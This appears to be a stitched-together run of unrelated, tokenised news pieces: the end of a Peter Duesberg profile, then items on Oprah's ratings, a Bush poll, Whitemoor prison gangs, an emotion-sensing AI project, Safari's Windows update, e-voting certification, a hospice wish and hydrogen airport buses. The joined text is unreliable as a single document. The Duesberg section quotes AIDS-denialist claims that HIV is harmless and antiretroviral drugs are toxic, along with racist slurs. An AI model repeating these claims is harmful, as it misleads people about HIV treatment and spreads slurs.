When Duesberg arrived at the registration desk manned by Siggi , he saw an opportunity for mischief .
He had overheard that Gallo had cancelled at the last minute , so when she asked his name , he boldly announced , “ I ’m Dr. Gallo ! ”
The joke was up within minutes , but both Duesberg and Sachs enjoyed the prank , and it became a running gag between the two .
Shortly after the conference , she resigned her position to move to Berkeley , where she now organizes Duesberg ’s research data and his conferences on cancer and aneuploidy .
Cancer , according to Duesberg ’s theory , occurs when chromosomes fail to divide properly .
During cell division , or mitosis , the 23 pairs of chromosomes must line up and divide perfectly to yield 46 individual chromosomes , with exactly half — one chromosome from each pair — going to each of two daughter cells .
Sometimes the division is faulty and the pairs rip apart eccentrically , like a paper towel that fails to tear along the perforation .
The separation gives too much chromosomal material to one daughter cell and shortchanges the other .
This aneuploidy , or unequal distribution of chromosomes , is often fatal to the cells .
But in some instances the aneuploidic cells survive .
Then , like a top spinning out of control , each new cell division can cause more bizarre changes in the chromosomes .
Lacking the correct blueprint for growth , the process produces cells that are increasingly unrecognizable .
They are neither liver nor nose , breast nor testicle .
Nor are they confined to the organ in which they originated .
They are cancer , a cluster of cells that grow without regard for what they should be and how they should behave .
Duesberg ’s theory on cancer has triggered almost as violent a reaction in some quarters as did his assertion that HIV does n’t cause AIDS .
Several researchers interviewed , after asking to go off the record , erupted in venomous attacks on Duesberg , saying that aneuploidy is the result of cancer , not the cause .
But recently a number of mainstream scientists have come around , agreeing that aneuploidy may play a role ( even if not an exclusive one ) in cancer .
In 2005 Duesberg was invited by the National Institutes of Health — which had long since dismissed him and his research — to give a grand rounds presentation on his aneuploidy work .
Other researchers , such as Thomas Ried of the National Cancer Institute , are conducting their own studies and joining Duesberg at international conferences on the subject .
Several scientific journals have even published Duesberg ’s writings on the topic , including , in 2007 , Scientific American .
Editors there , wary of Duesberg ’s reputation , ran a lengthy editorial entitled “ When Pariahs Have Good Ideas , ” explaining their reasons for choosing to publish his paper .
They wrote , “ To dismiss a scientist solely for holding some wrong or controversial views risks sweeping away valuable nuggets of truth . ”
Despite the 1996 call by The Lancet ’s editor to fund Duesberg ’s research on AIDS , and despite Scientific American ’s plea more than a decade later that the scientific community consider his theories on cancer , Peter Duesberg is still fighting daunting scientific battles .
And he is doing so with meager funding and only a small band of supporters .
One , Christian Fiala , an obstetrician and gynecologist based in Vienna , says Duesberg “ is obviously following a rational and evidence - based thinking and argues accordingly . ”
Fiala first doubted that HIV was the cause of AIDS when experts warned that the disease was set to spread beyond the known risk groups — gay men , intravenous drug users and hemophiliacs .
That did n’t make sense to him .
Diseases that are confined to risk groups stay confined to risk groups , he says , unless there is some major event like the organism ’s mutating into some new , more highly virulent form of disease , and there was no evidence of that .
Fiala cautions against writing off researchers like Duesberg , saying there is a history of dissenters ’ being right .
“ They persecuted Semmelweis , too , ” Fiala says of the famed 19th - century Hungarian who practiced medicine in Vienna .
Although that city now has a hospital named in honor of Ignaz Semmelweis , Fiala recounts how the physician was pilloried , fired from his job , and banned from the city for his suggestion that doctors were largely to blame for the deaths of many thousands of women during the 1800s from “ childbed fever , ” an infection of the uterus that occurred shortly after birth .
It was a number of years and many more deaths before doctors realized that Semmelweis was right : Doctors were infecting women during childbirth .
Childbed deaths fell to one - tenth their previous level when doctors followed Semmelweis ’s admonition to wash their hands .
Another parallel with Semmelweis may be more instructive .
Historians have suggested that Semmelweis was his own worst enemy — that he was obstinate and imperious , refusing to write up his findings .
Had he been more politic , they say , perhaps his ideas would have been more carefully evaluated .
The same may be true of Duesberg .
Where Semmelweis would n’t put pen to paper , Duesberg , many say , wo n’t listen or shut up .
Although Duesberg can be remarkably charming , he can also be disturbingly crass .
For example , he repeatedly refers to gay people as “ homos ” and blacks as “ Schwartzes . ”
In defending Nobel laureate James Watson ’s controversial remarks on race , he says : “ Here you ’re supposed to be the honest scientist and base everything on evidence , and then you ’re supposed to say , OK , we ’re all the same and we feel equally sorry for some black in Africa [ and ] one relative here in Berkeley or friend in Berkeley or whoever it is .
Obviously you do n’t . ”
Siggi Duesberg is well aware of the charges of racism that swirl around her husband .
Duesberg ’s influence on President Thabo Mbeki of South Africa — who has cited his theories when denying the use of ARVs for HIV / AIDS patients in South Africa — makes Duesberg complicit , his critics charge , with a government policy responsible for what they call the “ murder ” of many Africans who have died without ARV treatment .
Max Essex believes that history will judge Duesberg as either “ a nut who is just a tease to the scientific community ” or an “ enabler to mass murder ” for the deaths of many AIDS patients in Africa .
Although Essex does n’t make the charge of racism , he says that Duesberg ’s claims must derive from some “ ulterior motive or serious psychological blind spot . ”
Duesberg , for his part , does little to dispel the festering controversy .
As his wife stands outside a Berkeley restaurant , she ca n’t help but look exasperated and roll her eyes at his behavior , saying : “ My husband has just a very bad mouth sometimes , and I tell him , ‘ Just keep your mouth shut .
People who do n’t know you that well do n’t know your kind of humor sometimes . ’”
During a later phone call , she says , “ He is not a racist . ”
But she adds that the couple have had “ lots of arguments ” about the way he talks .
Then she sighs and says : “ I also realized that I can not really change him .
Nobody can change him . ”
The only refuge , besides Mannheim , from the controversies that dog Duesberg is within the four walls of his Berkeley lab .
As he enters to conduct an undergraduate class , several students greet him with broad smiles .
There is an air of industry as the students hold up pieces of paper and stare at them intently .
They are performing Southern blot tests to detect the lambda viral genome they ’ve inserted into the DNA of Escherichia coli .
A few students approach Duesberg to ask advice about other projects .
He gives each one his full attention .
Huddled in one corner of the lab amid microscopes , gas jets , and flasks , half a dozen students talk about their professor .
One says Duesberg is one of the “ most pro-student teachers on campus . ”
The other students nod in agreement .
“ Other teachers hide from their students , but not Dr. Duesberg , ” another adds .
“ He ’s the best teacher here . ”
When the students are asked what they think about the controversies surrounding their professor , their faces go blank .
It is obvious that they are unaware of the imbroglio surrounding him .
Some of these members of the Peter Duesberg fan club were not even born when the controversy over AIDS and HIV hit its boiling point in the late 1980s and early 1990s .
One student , uncertain about what is being asked , offers tentatively , “ Almost all of our professors are famous . ”
Away from the students , Duesberg , his mind ever racing , explains how eager he is for studies that could prove or disprove his hypotheses about HIV — studies like treating mice or rats with poppers for extended periods to see if they develop AIDS and Kaposi ’s sarcoma .
That ’s the sort of functional evidence that he says is sorely needed and not pursued by researchers today .
He also suggests tracking the health of applicants to the U.S. military — over the past 22 years , the military has tested millions of potential recruits for HIV .
Some of those testing positive are being treated , and some are not .
Duesberg says such a study would show “ whether otherwise healthy people with HIV get AIDS - defining diseases above the norm for matched controls without HIV . ”
If HIV is just a “ harmless passenger virus ” as he believes , untreated HIV - positive individuals might be expected to do at least as well as , or better than , HIV - positive patients who take antiretro­viral drugs .
Essex dismisses such a study , saying , “ I think that would be totally unethical . ”
Only when there is no existing treatment for a condition , Essex says , should a placebo or no medical intervention be allowed .
“ As soon as somebody said , OK , this drug does better than a placebo , then it would be the standard that you test the next drug against or a combination of drugs against .
That ’s the first thing you learn in ethics … like doing the infamous syphilis experiment at Tuskegee .
It ’s exactly like it .
It ’s totally unethical . ”
Duesberg does n’t see anything wrong with studying untreated patients .
“ What ’s unethical about it ? ” he asks .
“ No one would be asked not to take drugs . ” A small contingent of scientists , including two Nobel laureates , agree with Duesberg and think it ’s unethical not to test his theories .
Perhaps surprisingly , a number of people who have tested HIV - positive or even been diagnosed with AIDS also believe Duesberg is right .
One , a 47 - year - old gay man who lives in New York City , has been HIV - positive for 23 years and has never taken antiretroviral drugs .
He believes they are “ toxic , ” and he credits Duesberg with his survival .
“ I watched my friends take more and more drugs and get sicker and sicker , ” he says .
ARVs , not HIV , he claims , are responsible for their deaths .
Right or wrong , for more than two decades Duesberg has surely paid a price for his beliefs .
Even close friends have begged him to back off some of his statements , if only so he is n’t targeted and shunned .
Asked why he persists in raising questions about AIDS when it has resulted in financial losses , professional rejection , and social isolation for him and his family , Duesberg , pushing his bike along a walkway that winds its way through the lush grass and stately trees of the Berkeley campus , stops walking , thinks for a few moments , and says , “ I do n’t want to be a ‘ good German . ’ ”
Not Everyone Likes Oprah ... Gasp !
Has billionaire 's image started to slip ?
According to The New York Times , nearly every aspect of Oprah 's empire has had a downturn over the past three years .
Make no mistake - the brand is very much alive but the slippage is significant .
The Oprah Winfrey Show has lost 7 percent of it's viewership this year alone .
Nielsen Media Research statistics show that it is the third straight year of decline for the afternoon talk show .
It remains the top talk show but is declining while Ellen DeGeneres is gaining market share .
O's latest television venture , Oprah 's Big Give started hot out of the gate but declined rapidly .
Initial word was that the ABC reality program was canceled after one season .
Oprah 's camp immediately issued a statement saying they chose not to renew and eventually ABC chimed in and said they loved the show and would have given it a second season nod had it not been for Oprah 's decision to curtail the project .
The Audit Bureau of Circulations reports that Oprah 's magazine O has fallen off more than 10 percent in the last three years .
This significant loss of market share has prompted the retirement of editor in chief Amy Gross .
She will stay at the helm until her replacement is in place .
Oprah has taken a bit of a beating for her endorsement of political candidate Barack Obama .
Some speculate that she has fallen out of favor with many of the middle aged white women who support Senator Hillary Clinton .
A Gallup poll was conducted shortly after Winfrey declared herself an Obama supporter in October 2007 .
Her favorable rating fell by 8 percentage points while here unfavorable rating jumped to 26 percent from 17 percent .
Clearly the endorsement hurt O . The celebrity has not been involved in the campaign since February .
The president of Harpo Productions , Tim Bennett , does n't believe that Oprah 's political endorsement has caused her primary business venture to falter .
His theory is that the decline is due to a general weakness in the overall television audience .
He contends that they have not received any feedback that would suggest anything is amiss .
The Oprah Winfrey Leadership Academy for Girls is perhaps Winfrey 's crowning accomplishment and even that philanthropic venture received negative publicity last year over allegations that a dorm matron was abusing students .
A trial is scheduled to start in July .
One of Harpo 's latest programs , The Rachael Ray Show , has recently fallen off of Nielsen 's list of the top 25 syndicated programs .
A new development deal is in the works featuring Kirstie Alley .
The actress recently severed ties with weight loss maven Jenny Craig and is reportedly putting together her own program .
Oprah is embarking on a new cable channel startup in conjunction with Discovery Communications .
The Oprah Winfrey Network ( OWN ) will broadcast empowering programs .
She also has a new gig going on Satellite radio .
Clearly the empire is still churning right along and generating mega revenue at every turn .
Evidence is mounting that would suggest that people have started to consider Oprah a mere mortal where once she was worshiped by the masses ; no doubt a humbling experience for Lady O - and then again maybe not .
Check out photos below .
WASHINGTON DC ( CNN ) --
A new poll suggests that President Bush is the most unpopular president in modern American history .
A CNN / Opinion Research Corp. survey released Thursday indicates that 71 percent of the American public disapprove of how Bush is handling his job as president .
" No president has ever had a higher disapproval rating in any CNN or Gallup Poll ; in fact , this is the first time that any president 's disapproval rating has cracked the 70 percent mark , " said Keating Holland , CNN 's polling director .
" Bush 's approval rating , which stands at 28 percent in our new poll , remains better than the all - time lows set by Harry Truman and Richard Nixon [ 22 percent and 24 percent , respectively ] , but even those two presidents never got a disapproval rating in the 70s , " Holland said .
" The previous all - time record in CNN or Gallup polling was set by Truman , 67 percent disapproval in January 1952 . "
While Gallup polling goes back to the 1930s , it was n't until the Truman years that they began surveying monthly approval ratings .
CNN Senior Political Analyst Bill Schneider adds , " He is more unpopular than Richard Nixon was just before he resigned from the presidency in August 1974 . "
President Nixon 's disapproval rating in August 1974 stood at 66 percent
Do n't Miss Bush pushes 3 nations on nuclear issue
The poll also indicates that support for the war in Iraq has never been lower .
Thirty percent of those questioned favored the war , while 68 percent opposed it .
" Americans are growing more pessimistic about the war , " Holland said .
" In January , nearly half believed that things were going well for the U.S. in Iraq ; now that figure has dropped to 39 percent . "
The numbers on the Iraq war come on the five - year anniversary of Bush 's " Mission Accomplished " moment on board the aircraft carrier USS Abraham Lincoln , when he proclaimed that " major combat operations in Iraq have ended . "
The record - low support for the war in a CNN poll could be one reason behind the president 's unpopularity , but it probably is not the only one .
" Support for the war , the assessment of the economy and approval of Mr. Bush are all about the same -- bad , " Schneider said .
The CNN / Opinion Research Corp. poll was conducted by telephone from Monday through Wednesday among 1,008 adult Americans .
The poll 's sampling error is plus or minus 3 percentage points .
E-mail to a friend
All About George W. Bush • Iraq War
Prison officers at one of Britain 's maximum security jails are losing control to Muslim gangs , according to a confidential report obtained by The Observer .
An internal review of Whitemoor in Cambridgeshire warns that staff believe a ' serious incident is imminent ' as several wings become dominated by Muslim prisoners .
The report , written by the Prison Service 's Directorate of High Security , says there is an ' ongoing theme of fear and instability ' among staff at Whitemoor , where just under a third of the 500 prisoners are Muslim .
It claims : ' There was much talk around the establishment about " the Muslims " .
Some staff perceived the situation at Whitemoor had resulted in Muslim prisoners becoming more of a gang than a religious group .
The sheer numbers , coupled with a lack of awareness among staff , appeared to be engendering fear and handing control to the prisoners . '
The situation has become so acute that white prisoners are routinely warned about the Muslim gangs by staff on arrival .
The report says that apprehension about Muslim prisoners has potentially damaging consequences and is in danger of ' leading to hostility and Islamophobia ' .
It serves to highlight the growing concern about extremist activity in the UK 's jails .
The Home Office is concerned that young male prisoners are being radicalised by Muslim gangs and that the prison system is becoming a recruiting ground for al - Qaeda sympathisers .
Similar problems have been experienced at Belmarsh prison in London and Frankland in Durham .
A number of high - profile al - Qaeda sympathisers at Frankland have been moved as a result of increased tensions within the jail .
Frances Crook , director of the Howard League for Penal Reform , said she was alarmed at the report 's findings .
' The difficulties of running a high - security prison such as Whitemoor cannot be underestimated , but much of what this internal report uncovers is extremely disturbing , ' she said .
' It is vital that the problems uncovered at Whitemoor are addressed as a matter of urgency . '
The report was commissioned partly as a response to the deaths of five prisoners at the jail within 12 months .
Muslim prisoner support groups have also complained that Muslims are suffering harassment from staff .
Recently a number of Whitemoor staff have been suspended on unrelated corruption charges .
The tense stand - off between staff and prisoners is causing problems , the report warns .
' Staff appeared reluctant to challenge inappropriate behaviour , in particular among BME [ black and ethnic minority ] prisoners for fear of doing the wrong thing , ' the report states .
' This was leading to a general feeling of a lack of control and shifting the power dynamic towards prisoners . '
It adds : ' A wing itself felt particularly unstable with a general lack of confidence among staff . '
The emergence of gang culture in Whitemoor has alarmed some prisoners .
The team that compiled the report found that over the Christmas period the segregation unit was full as inmates sought refuge from the gangs over debt problems and drugs .
Henry Bellingham , the Conservatives ' shadow justice minister , who has raised concerns about the running of Whitemoor in parliament , said he welcomed the report .
' However , I 'm very concerned about some of the findings , ' he added .
' They point to a systematic breakdown in the chain of command .
It 's in everyone 's interests that these problems are sorted out soon .
Whitemoor holds some of the most dangerous prisoners in the country . '
In recent months the Prison Service has unveiled a series of initiatives to combat extremism in the UK's jails through the supervision and monitoring of imams and better training for staff .
' It is vital that prison staff are equipped with the knowledge and skills to ensure they have the confidence to identify and challenge behaviour that is of concern , ' said a spokeswoman for the Ministry of Justice .
' A programme of work is planned at Whitemoor to increase mutual understanding between staff and prisoners , including a development day for staff on the Muslim faith , focus groups in which staff and ethnic minority prisoners will discuss prison community issues , and diversity events .
' The prison will continue to work closely with the Prison Service 's Extremism Unit and the police to monitor and assess issues around extremism , and work will be undertaken to examine the management of gangs and terrorist prisoners within the prison . '
A computer system that can carry on a discussion with a human being by reacting to signals such as tone of voice and facial expression is being developed by an international team including Queen 's University Belfast .
Known as SEMAINE , the project will build a Sensitive Artificial Listener ( SAL ) system , which will perceive a human user 's facial expression , gaze , and voice and then engage with the user .
When engaging with a human , the SAL will be able to adapt its own performance and pursue different actions , depending on the non-verbal behaviour of the user .
SEMAINE is led by DFKI , the German centre for research on Artificial Intelligence : the other partners are Imperial College , London , the University of Paris 8 , the University of Twente in Holland , and the Technical University of Munich .
Professor Roddy Cowie , from the School of Psychology , leads the team at Queen's .
He said : " A basic feature of human communication is that it is coloured by emotion .
When we talk to another person , the words are carried on an undercurrent of signs that show them what attracts us , what bores us and so on .
The fact that computers do not currently do this is one of the main reasons why communicating with them is so unlike interacting with a human .
It is also one of the reasons we can find them so frustrating , " said Professor Cowie .
" SEMAINE and projects like it will change the way people interact with technology .
They mean that you will be talking to your computer in 20 years time .
When you do , pause for a minute , and remember that the human sciences at Queen 's helped to lay the groundwork .
" These new developments depend on connecting technology to the relevant understanding of people , and it is recognised worldwide that we have a distinctive strength in bringing psychology , linguistics and ethics to bear on the process of developing the new systems . "
Professor Cowie added : " Today when we use technology we adopt a style of communication that suits the machine .
Through projects like HUMAINE , SEMAINE , and others linked to them , we will develop technology that will eventually communicate in ways that suit human beings . "
The European Commission awarded SEMAINE a grant of € 2.75 million after it was ranked first out of 143 bids for medium - sized projects in the area of cognitive systems and robotics .
It was a decidedly underhanded move – Apple 's slipping that copy of Safari 3.1 in with the latest version of its Windows - software update .
But beyond annoying and alienating a sizable portion of users , it also appears it was rather effective .
According to Net Applications , the sneaky update , which included a copy of the new ( non-beta ) web browser , actually increased Safari 's Windows market share threefold over the course of one month .
" Safari 3.0 on Windows never gained much market share , peaking at 0.07 percent , " the company notes .
" However , Safari 3.1 on Windows is rapidly gaining market share , already tripling Safari 3.0's peak . "
Anyway , Windows users need n't worry about any more covert updates .
Apple revised its software - update protocol last month and said it will clearly mark new software from " updates " from now on .
Furthermore , the box to accept these programs will be unchecked by default .
It 'll be interesting to see whether this uptick in Safari usage among Windows users was simply a fluke ( and truly the result of Apple 's sneakiness ) or whether it could have something to do with users actually liking Safari .
Graph : Net Applications
After Failures Discovered During Testing of New E- Voting Systems Made by Sequoia , Election Officials Actually Listen , Respond to Citizen Concerns ...
Ellen Theisen Byon 5/27/2008 , 2:50 pm PT
Guest blogged by Ellen Theisen , VotersUnite.org
The actions and attitudes of election officials all too often seem like Alice 's experiences down the rabbit hole .
So , it 's nice occasionally to report on positive developments by public officials who actually listen to the concerns of citizens , rather than simply ignoring serious defects discovered in our voting systems .
I 'm happy to report such a story today .
For a change .
On May 6 , Patty Murphy , Voting Systems Support , Secretary of State ’s Office , notified my VotersUnite.org colleague and fellow Washington state resident John Gideon and me that two new voting systems were to be tested for state certification here on May 13 through May 16 , and that the Review Board would hold a hearing on May 23 .
The Board ’s job is to thoroughly review certification applications and make recommendations to the Secretary of State .
The two systems were :
An ES&S AutoMark / optical scanner system , tested against federal standards and qualified by NASED .
A new , untested touch - screen / optical scanner system made by Sequoia Voting Systems
John and I were concerned about the Sequoia system .
Pierce County , WA , voters recently voted to use Ranked Choice Voting ( RCV ) , a system where voters may specify their preferences in particular races on the ballot as " first choice , " " second choice , " or " third choice . "
However , no state - certified system had the software needed to tabulate RCV ballots .
So Sequoia developed their software specifically for Pierce County .
They had applied for “ emergency ” provisional certification from the state , which would allow them to bypass state requirements for independent testing to the federal standards .
Tabulating RCV ballots is much more complicated than tabulating traditional ballots .
With RCV , after voters mark their first , second , and third choices for certain offices , the tabulation is done in a series of “ rounds . ”
The candidate with the fewest “ first choice ” votes after each round is eliminated ; then in the next round the second choice on those ballots is counted as if it were the first choice .
Rounds continue until one candidate has the majority of the votes .
For a fuller explanation , see the Pierce County website .
John and I had planned to go to the testing on May 14 , but at the last minute the testing for that day was called off so officials could investigate a problem that had shown up the previous day .
As we found out later , officials had found the Sequoia system had tallied votes wrong .
Later in the day , the SoS office 's Murphy emailed us to let us know what happened ...
Monday night , a test run was done on the 5 insights [ Sequoia Insight Optical Scanners ] .
Once complete , one tester zeroed out each machine and memory pack .
( You can reset , or zero out , the memory pack at the Insight machine . )
Following this tester was a 2nd worker who powered off all the Insights .
On one of the machines , they powered it off before the machine was finished zeroing out the memory pack .
Each memory pack has all the results tabulated by precinct first on the pack , followed by cast vote records that have results by ballot .
It zeroed out the tabulated section , but it did n't erase all the cast vote records .
On Tuesday , when we started the machines , we ran zero reports .
They were all zero because they show all the tabulated results by precinct ( the portion that was zeroed out ) .
However , when we moved the memory packs to the reporting software , it added up all the cast vote records , and reported those results .
In other words , the Sequoia system checked one set of electronic ballot records and reported an “ empty ballot box , ” but then used a different set of ballot records to tabulate the votes .
This is exactly like checking one ballot box to ensure that it ’s empty before opening the polls , and then using a different , unchecked ballot box for the voted ballots to be tallied at the end of the day .
But the unchecked box had n’t been empty .
John and I both wrote up testimony , which we immediately sent to Patty Murphy .
As you can imagine , we objected to having a system certified when , in testing , it reported that there were " zero votes " to start , but actually had 56 votes already in its secret , unobservable " ballot box " !
Patty passed our testimony along to the Review Board so they would have time to read our statements before the hearing .
( Here 's John 's [ PDF ] .
Here 's mine [ PDF ] . )
We also had several email exchanges with Patty .
She answered all our questions thoroughly and promptly , and at our request she even sent us detailed charts showing how each ballot in each test was marked .
On May 23 , the Review Board hearing to discuss the certification testing arrived .
Both John and I had oral testimony ready since the agenda showed a period allowed for public comment .
We had seen the state provisionally certify quickly - developed , untested software prior to the 2004 primary election , in spite of our objections , so we were fearful of what the outcome of the hearing might be .
Presiding over the hearing was Shane Hamlin , Assistant Director of Elections for Washington State .
The four members of the board were :
Joaquin Avila , Visiting Asst. Professor of Law , Seattle University , School of Law
, Visiting Asst. Professor of Law , Seattle University , School of Law Debbie Cook , Director , Washington Assistive Technology Alliance
, Director , Washington Assistive Technology Alliance Michael Rooney , Elections Specialist , Pierce County Elections
, Elections Specialist , Pierce County Elections Kim Wyman , Auditor , Thurston County
Thurston County uses ES&S equipment , so without hesitation , Kim Wyman recused herself from the decision regarding ES&S .
Michael Rooney recused himself from the Sequoia decision , since it would impact Pierce County .
Patty Murphy started out by summarizing the ES&S system , the testing , and the findings .
She also added a new recommendation we had n’t heard before — a recommendation to certify new AutoMark software that had n’t been tested with the rest of the ES&S system .
Neither John nor I had intended to comment on the ES&S system , but at that point , we both changed our minds .
John pointed out that federal voting system standards do n't allow for “ mix and match ” but that a system has to be tested and approved as a whole .
New software on the AutoMark would mean the system no longer met federal testing standards .
I added that since the AutoMark software interacts with the Unity software to generate ballots , it was essential to test that they were compatible with each other .
Steve Pearson , a representative on - hand from ES&S , said that SysTest , one of the Voting System Test Labs certified by the U.S. Election Assistance Commission ( EAC ) , had tested the compatibility and would be issuing a report within a week .
He pointed out that the EAC certification process takes so long that they decided to have SysTest do the testing and provide a report outside the regular EAC certification process .
John and I gasped !
ES&S was attempting to do an end - run around the EAC certification process !!!
John moved to a chair with a microphone , and when Mr. Pearson was finished with his statement , Hamlin indicated for John to go ahead .
John used the word “ circumvent ” instead of “ end-run ” — a respectable touch I thought .
Pearson denied that charge , of course , but John ’s point was n’t lost on the board .
Their final unanimous decision was to recommend certification for the NASED - qualified ES&S system , and approval for the new AutoMark pending a satisfactory report from SysTest .
Knowing ES&S ’s history of promises made and promises broken , John and I do n’t expect that report anytime soon .
The next part of the hearing dealt with the dangerously inaccurate Sequoia system .
First , Patty Murphy presented information about the system and the county ’s testing and findings .
( Here ’s where the “ transparent ” part of this article ’s headline comes into play . )
Patty thoroughly described the problem that had occurred , the discrepancy in the results , and the possible workarounds proposed by Sequoia — which involved “ patching ” the software in both the scanner that falsely reported a blank ballot box and in the WinEDS software that counted ballots from the “ stuffed ” ballot box .
Then she added a new thought we had n’t heard before : the possibility of using the Sequoia Edge touch - screen machine , the central count optical scanner , and the WinEDS tabulating software without using the flawed , precinct - based Insight scanner .
I thought that sounded like a possible solution .
Regarding the complex algorithm used to tally RCV ballots , Murphy pointed out that software , of some type , would be needed to tally such ballots correctly .
She explained how they tried hand - counting just 14 RCV ballots with seven ranked contests and found that it was “ horrendous . ”
Using software to tally this sort of balloting was absolutely essential .
She found that it simply could n’t be done any other way .
In other words , if this system were n’t approved , it would be impossible to comply with the mandate from Pierce County voters .
Quite a problem to present to the Board .
Pat McCarthy , Pierce County Auditor , spoke first .
She said that she was so concerned about the flaw discvoered on the Insight scanner , she had decided not to use it at all , contrary to her original intention .
I was impressed .
Too often , we see elections officials ignore the problems with voting equipment and use it anyway , claiming that their administrative procedures can make up for the flaws .
But McCarthy had listened to the evidence and had decided to reject the equipment , regardless of what the Board recommended or whether the SoS certified it .
How refreshing to observe a responsible decision , responsive to evidence .
But she was n’t the only official to respond to the evidence that day .
( Here comes the “ participatory ” part of our headline . )
I can tell you some of the subsequent interaction , but I ca n’t remember the order in which things were said because Shane Hamlin , the Assistant Director of Elections for Washington State , who presided over the hearing , allowed John and me to speak as much and as often as we wanted .
We gave our initial comments , and then , as we had other things to say during the proceedings , we went back to the microphone and spoke .
And we were heard .
Let me say that again for emphasis :
We were heard !
Edwin Smith from Sequoia was there to represent their system that had failed during testing .
He attempted to claim that the miscount was n’t really an accuracy issue , because it had been caused by an operator error that could be handled through proper procedures .
But the Review Board heard John ’s statements about the accuracy requirements in federal and state law and acted on them responsibly --- as you ’ll read in a moment .
( Ed Note : Smith is the Sequoia VP who recently sent an intimidating email to two Princeton computer - science professors , threatening them with legal action by the company should they independently examine the touch - screen voting machines made by Sequoia which had failed during New Jersey 's recent Super Tuesday primary election , as requested by NJ county election officials .
Smith 's strong - arm tactics momentarily succeeded until a state judge ordered Sequoia be ignored , and the state 's machines undergo testing .
Smith was also the man responsible for hiring a so - called " independent " examiner to review the same failed machines on behalf of Sequoia .
Smith was subsequently reprimanded , and the " independent " examiner , Mike Gibbons , was released from his job after The BRAD BLOG revealed some disturbing information about Gibbons . )
I pointed out that what Smith referred to as “ operator error ” was actually good testing , and I saw heads nod among the Review Board .
I also asked how many ballots were expected in the election , and McCarthy estimated “ 400,000 . ”
I told the Board I was concerned about the fact that they had only tested 178 RCV ballots and yet planned to tabulating some 400,000 in the election .
I reminded them about the disaster that occurred in Denver in 2006 when they used voter check - in software that had n’t been stress tested under conditions that would actually be in place on a live election day .
The system crashed under high volume and disenfranchised tens of thousands of Denver voters that day .
This was when it became evident to me that we were in a discussion with other concerned citizens rather than “ testifying ” in a phony “ hearing ” before officials whose minds were already made up .
Patty Murphy asked if I would be less concerned if all the ballot records were made available so that citizens could run their own checks on them .
As we discussed that idea , I found out that Pat McCarthy was already planning to post the individual ballot records on the Pierce County website immediately after the election .
When I pointed out that it would be essential to have complete counting rules , the format of the records , and some sample records as soon as possible so people could begin developing independent programs right away , Patty and Pat agreed to make them available very soon .
To get us back on track , John emphasized again that using a system that miscounted votes was a violation of federal law that could not be ignored .
Debbie Cook then summed up the options concisely , said it was time to take action , and made a motion to recommend approval for the system , with a stipulation prohibiting the use of the Insight scanner .
Joachin Avila suggested adding another amendment — the approval would depend on a legal decision that the system would not violate the accuracy requirement of federal law as long as the Insight was n’t used .
The Review Board unanimously passed the motion as amended .
We hope Sam Reed , Washington 's Secretary of State , will accept their recommendation .
After the hearing , John and I agreed that the staff --- Shane Hamlin and Patty Murphy --- had been stunningly welcoming of our participation , that we had truly been heard , and that the Board had acted wisely and responsibly in a difficult situation .
Quite a day , to find ourselves UP the rabbit hole into sunshine and sanity .
For a change .
As a first time voter , I analyze events in the U.S. Preisdential election with a brand new perspective
Dying Man's Wish Granted by Dallas Cowboy Cheerleaders ( Video )
. , a terminally ill cancer patient received his dying wish to meet the Dallas Cowboy Cheerleaders .
The 26 - year - old North Texas man was all smiles when the cheerleaders greeted him .
The visit was arranged by Vistacare , the hospice organization caring for Harris .
According to Mark 's father , " Some days are funny , some days are a lot of fun and laughter , some days are very sad , some are very heart wrenching . "
Getting to meet the cheerleaders was a good day for Mark and his family .
He also got to meet the Dallas Mavericks Dancers the same day .
Although his prognosis is day - to - day , Harris says he is not worried .
" It hurts a lot but at first , you just let it go because I know that God is with me , I 'm not worried . "
Mark has one final wish .
" My wish is that I can just go to heaven and look down and see my family succeed . "
View video of Mark Harris Jr.'s visit with the Dallas Cowboy Cheerleaders below .
ORLANDO , Florida ( CNN ) --
Some Florida amusement park visitors may enjoy space - themed roller - coasters , but the first vehicle they board at Orlando International Airport may be the most futuristic ride of their vacation .
Four hydrogen shuttle buses are part of the fleet at the Orlando International Airport .
The airport is testing four Ford shuttle vans equipped with internal combustion engines modified to run on hydrogen instead of gasoline .
" It 's quiet , it does n't shake like diesel , it does n't have that diesel smell , " said Rafael Sanchez , who has been driving the vans for a year .
The quieter engine makes conversation inside the bus easier than in conventional vehicles .
" Hydrogen is one of the many technologies we are exploring , trying to become more of a green airport , " said Ronald Lewis , director of airport operations .
Vehicles powered with hydrogen engines are different from the many vehicles across the nation that run with the help of hydrogen fuel cells -- which are the gold standard of green machines .
The use of hydrogen in internal combustion engines is far less efficient than in the fuel cells .
The modified engines aboard the Ford E - 450 shuttle buses are 6.8 liter V - 10s .
The airport 's fleet also includes three gas - electric hybrid vehicles and 24 biodiesel buses .
The facility also powers its maintenance equipment -- such as lawnmowers and tractors -- with biodiesel .
But like many experiments with alternative fuels , the price is very high and the long - term outcome is unknown .
Proponents of hydrogen technology have long had a chicken - and - egg dilemma over whether to build million - dollar fueling facilities or to wait until more vehicles are in use .
Energy companies are reluctant to pour money into expensive fueling stations without a lot of hydrogen vehicles around , but consumers are not likely to buy a vehicle without adequate places to fill up .
" It is clear nothing is going to displace gasoline or diesel for 20 , 30 , maybe 40 years , " said John Lapetz , who has been working on alternative fuels at Ford for more than 20 years .
The Orlando project has several goals :
To get average consumers acquainted with hydrogen and to acquire data on the buses ' performance in a setting where they are in use almost nonstop .
Lapetz said it's an effort to use a technology that customers take for granted ( the internal combustion engine ) , while preparing for the day when drivers can complete the divorce from fossil fuels .
At the Boggy Creek Hydrogen Fueling Station in Orlando , the hydrogen is produced on - site .
" We are doing a process called steam methane re-forming , which is natural gas to hydrogen , " said Puneet Verma , manager of biofuels and hydrogen at Chevron Technology Ventures , one of the players involved in the project .
During a careful fueling process , technicians check for leaks of the highly flammable hydrogen -- leaks both in the bus and the fuel pump .
Because a fossil fuel , methane , is used to make the hydrogen , the buses are about 12 percent cleaner than gasoline or diesel when their entire carbon footprint is measured .
" We view the hydrogen efforts as a technical success , " said Verma .
" This is the first time we have been able to demonstrate actual production of hydrogen at the station .
It 's not necessarily an economic success yet . "
" The ultimate goal is hydrogen fuel cell cars , " Verma said .
" The hydrogen internal combustion engine buses are much less expensive to manufacture , but they consume a lot more hydrogen . "
Verma said the buses are " valid transition technology " aimed at quickly building significant demand for hydrogen , which would then justify an expensive infrastructure .
The hydrogen test project also includes the Greater Orlando Aviation Authority , Ford Motor Company , the Florida Department of Environmental Protection , Progress Energy and SeaWorld .
Hydrogen buses began shuttling SeaWorld employees in February from the park 's outer parking lots to their workplaces .
